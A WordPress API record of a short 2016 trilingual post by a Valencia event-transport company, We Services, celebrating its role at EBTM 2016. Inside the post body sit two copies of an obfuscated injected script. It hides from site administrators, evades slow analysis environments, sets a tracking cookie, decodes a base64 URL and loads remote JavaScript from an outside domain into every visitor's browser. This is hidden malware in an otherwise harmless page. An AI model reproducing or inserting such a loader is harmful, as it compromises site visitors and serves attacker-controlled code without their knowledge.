{"id":1085,"date":"2016-04-01T11:42:55","date_gmt":"2016-04-01T09:42:55","guid":{"rendered":"http:\/\/www.weservices.es\/?p=1085"},"modified":"2026-04-27T10:18:25","modified_gmt":"2026-04-27T10:18:25","slug":"ebtm-2016-valencia","status":"publish","type":"post","link":"https:\/\/weservices.es\/en\/ebtm-2016-valencia\/","title":{"rendered":"[:es]EBTM 2016 &#8211; VALENCIA[:en]EBTM 2016 &#8211; VALENCIA[:ca]EBTM 2016 &#8211; VAL\u00c8NCIA[:]"},"content":{"rendered":"<p>[:es]Orgullosos de la oficialidad en Valencia, y m\u00e1s aun de tener la confianza de organizadores for\u00e1neos para eventos como el EBTM 2016. \u00a1\u00a1Avanzando!![:en]<span id=\"result_box\" class=\"\" lang=\"en\">Proud of our officiality <span class=\"\">in Valencia<\/span>, evenmore gainig the trust of foreign organizers for events like 2016 EBTM Moving on <span class=\"\">!!<\/span><\/span>[:ca]<span id=\"result_box\" class=\"\" lang=\"ca\"><span class=\"\">Orgullosos<\/span> de l&#8217;oficialitat a Val\u00e8ncia, i m\u00e9s encara de tenir la confian\u00e7a d&#8217;organitzadors forans <span class=\"\">per a esdeveniments<\/span> <span class=\"\">com el<\/span> EBTM <span class=\"\">2016.<\/span> <span class=\"\">&#8216;<\/span><span class=\"\">Avan\u00e7ant<\/span> <span class=\"\">!!<\/span><\/span>[:]<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>[:es]Orgullosos de la oficialidad en Valencia, y m\u00e1s aun de tener la confianza de organizadores for\u00e1neos para eventos como el EBTM 2016. \u00a1\u00a1Avanzando!![:en]Proud of our officiality in Valencia, evenmore gainig the trust of foreign organizers for events like 2016 EBTM Moving on !![:ca]Orgullosos de l&#8217;oficialitat a Val\u00e8ncia, i m\u00e9s encara de tenir la confian\u00e7a d&#8217;organitzadors [&hellip;]<\/p>","protected":false},"author":2,"featured_media":1086,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[:es]EBTM 2016 - VALENCIA[:en]EBTM 2016 - VALENCIA[:ca]EBTM 2016 - VAL\u00c8NCIA[:] - We Services<\/title>\n<meta name=\"description\" content=\"Orgullosos de la oficialidad en Valencia, y m\u00e1s aun de tener la confianza de organizadores for\u00e1neos para eventos como el EBTM 2016. \u00a1\u00a1Avanzando!!Proud of\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/weservices.es\/en\/ebtm-2016-valencia\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]EBTM 2016 - VALENCIA[:en]EBTM 2016 - VALENCIA[:ca]EBTM 2016 - VAL\u00c8NCIA[:] - We Services\" \/>\n<meta property=\"og:description\" content=\"Orgullosos de la oficialidad en Valencia, y m\u00e1s aun de tener la confianza de organizadores for\u00e1neos para eventos como el EBTM 2016. \u00a1\u00a1Avanzando!!Proud of\" \/>\n<meta property=\"og:url\" content=\"https:\/\/weservices.es\/en\/ebtm-2016-valencia\/\" \/>\n<meta property=\"og:site_name\" content=\"We Services\" \/>\n<meta property=\"article:published_time\" content=\"2016-04-01T09:42:55+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-27T10:18:25+00:00\" \/>\n<meta name=\"author\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/weservices.es\/ebtm-2016-valencia\/\",\"url\":\"https:\/\/weservices.es\/ebtm-2016-valencia\/\",\"name\":\"[:es]EBTM 2016 - VALENCIA[:en]EBTM 2016 - VALENCIA[:ca]EBTM 2016 - VAL\u00c8NCIA[:] - We Services\",\"isPartOf\":{\"@id\":\"https:\/\/weservices.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/weservices.es\/ebtm-2016-valencia\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/weservices.es\/ebtm-2016-valencia\/#primaryimage\"},\"thumbnailUrl\":\"\",\"datePublished\":\"2016-04-01T09:42:55+00:00\",\"dateModified\":\"2026-04-27T10:18:25+00:00\",\"author\":{\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\"},\"description\":\"Orgullosos de la oficialidad en Valencia, y m\u00e1s aun de tener la confianza de organizadores for\u00e1neos para eventos como el EBTM 2016. \u00a1\u00a1Avanzando!!Proud of\",\"breadcrumb\":{\"@id\":\"https:\/\/weservices.es\/ebtm-2016-valencia\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/weservices.es\/ebtm-2016-valencia\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/ebtm-2016-valencia\/#primaryimage\",\"url\":\"\",\"contentUrl\":\"\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/weservices.es\/ebtm-2016-valencia\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/weservices.es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]EBTM 2016 &#8211; VALENCIA[:en]EBTM 2016 &#8211; VALENCIA[:ca]EBTM 2016 &#8211; VAL\u00c8NCIA[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/weservices.es\/#website\",\"url\":\"https:\/\/weservices.es\/\",\"name\":\"We Services\",\"description\":\"Transport for fairs and events\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/weservices.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\",\"name\":\"JOSE ANTONIO GARCIA SANCHEZ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"caption\":\"JOSE ANTONIO GARCIA SANCHEZ\"},\"url\":\"https:\/\/weservices.es\/en\/author\/jo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]EBTM 2016 - VALENCIA[:en]EBTM 2016 - VALENCIA[:ca]EBTM 2016 - VAL\u00c8NCIA[:] - We Services","description":"Orgullosos de la oficialidad en Valencia, y m\u00e1s aun de tener la confianza de organizadores for\u00e1neos para eventos como el EBTM 2016. \u00a1\u00a1Avanzando!!Proud of","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/weservices.es\/en\/ebtm-2016-valencia\/","og_locale":"en_US","og_type":"article","og_title":"[:es]EBTM 2016 - VALENCIA[:en]EBTM 2016 - VALENCIA[:ca]EBTM 2016 - VAL\u00c8NCIA[:] - We Services","og_description":"Orgullosos de la oficialidad en Valencia, y m\u00e1s aun de tener la confianza de organizadores for\u00e1neos para eventos como el EBTM 2016. \u00a1\u00a1Avanzando!!Proud of","og_url":"https:\/\/weservices.es\/en\/ebtm-2016-valencia\/","og_site_name":"We Services","article_published_time":"2016-04-01T09:42:55+00:00","article_modified_time":"2026-04-27T10:18:25+00:00","author":"JOSE ANTONIO GARCIA SANCHEZ","twitter_card":"summary_large_image","twitter_misc":{"Written by":"JOSE ANTONIO GARCIA SANCHEZ"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/weservices.es\/ebtm-2016-valencia\/","url":"https:\/\/weservices.es\/ebtm-2016-valencia\/","name":"[:es]EBTM 2016 - VALENCIA[:en]EBTM 2016 - VALENCIA[:ca]EBTM 2016 - VAL\u00c8NCIA[:] - We Services","isPartOf":{"@id":"https:\/\/weservices.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/weservices.es\/ebtm-2016-valencia\/#primaryimage"},"image":{"@id":"https:\/\/weservices.es\/ebtm-2016-valencia\/#primaryimage"},"thumbnailUrl":"","datePublished":"2016-04-01T09:42:55+00:00","dateModified":"2026-04-27T10:18:25+00:00","author":{"@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b"},"description":"Orgullosos de la oficialidad en Valencia, y m\u00e1s aun de tener la confianza de organizadores for\u00e1neos para eventos como el EBTM 2016. \u00a1\u00a1Avanzando!!Proud of","breadcrumb":{"@id":"https:\/\/weservices.es\/ebtm-2016-valencia\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/weservices.es\/ebtm-2016-valencia\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/ebtm-2016-valencia\/#primaryimage","url":"","contentUrl":""},{"@type":"BreadcrumbList","@id":"https:\/\/weservices.es\/ebtm-2016-valencia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/weservices.es\/"},{"@type":"ListItem","position":2,"name":"[:es]EBTM 2016 &#8211; VALENCIA[:en]EBTM 2016 &#8211; VALENCIA[:ca]EBTM 2016 &#8211; VAL\u00c8NCIA[:]"}]},{"@type":"WebSite","@id":"https:\/\/weservices.es\/#website","url":"https:\/\/weservices.es\/","name":"We Services","description":"Transport for fairs and events","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/weservices.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b","name":"JOSE ANTONIO GARCIA SANCHEZ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","caption":"JOSE ANTONIO GARCIA SANCHEZ"},"url":"https:\/\/weservices.es\/en\/author\/jo\/"}]}},"_links":{"self":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1085"}],"collection":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/comments?post=1085"}],"version-history":[{"count":2,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1085\/revisions"}],"predecessor-version":[{"id":3202,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1085\/revisions\/3202"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/media?parent=1085"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/categories?post=1085"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/tags?post=1085"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}